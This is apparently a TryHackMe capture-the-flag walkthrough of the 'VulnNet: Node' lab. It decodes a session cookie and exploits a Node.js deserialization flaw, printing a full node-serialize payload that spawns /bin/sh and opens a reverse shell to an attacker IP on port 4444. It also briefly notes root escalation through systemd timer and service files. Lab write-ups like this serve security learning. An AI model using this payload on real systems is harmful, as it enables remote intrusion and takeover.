VulnNet: Node TryHackMe WalkThrough

After the previous breach, VulnNet Entertainment states it won't happen again. Can you prove they're wrong?

VulnNet Entertainment has moved its infrastructure and now they’re confident that no breach will happen again. You’re tasked to prove otherwise and penetrate their network.

  • Difficulty: Easy
  • Web Language: JavaScript
TryHackMe | VulnNet: Node
After the previous breach, VulnNet Entertainment states it won't happen again. Can you prove they're wrong?

Enumeration

More Enumeration…


Manual Enumeration

  • No sensitive data on the source code.

Let’s open burp and catch the data.

Looking the cookie, i can see that the value of session is a base+url encode value.

eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D
{“username”:”Guest”,”isGuest”:true,”encoding”: “utf-8”}

So, the only way into the machine is through some RCE cause tampering the values of the cookie may not give anything.


Let’s Learn & Hack

Use the same cookie and request the home page /
  • Point to note is that we can see that we have unserialise error.

Let’s use the payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs

Used payload: {“username”:”_$$ND_FUNC$$_function (){(function(){var net = require(‘net’),cp = require(‘child_process’),sh = cp.spawn(‘/bin/sh’, []);var client = new net.Socket();client.connect(4444, ‘10.14.12.48’, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});})();}()”}

Got the reverse shell as www, and doing a lateral escaltion,


Privilege Escalation

change the .timer and .service file to get the reverse shell.

will get root shell in 1sec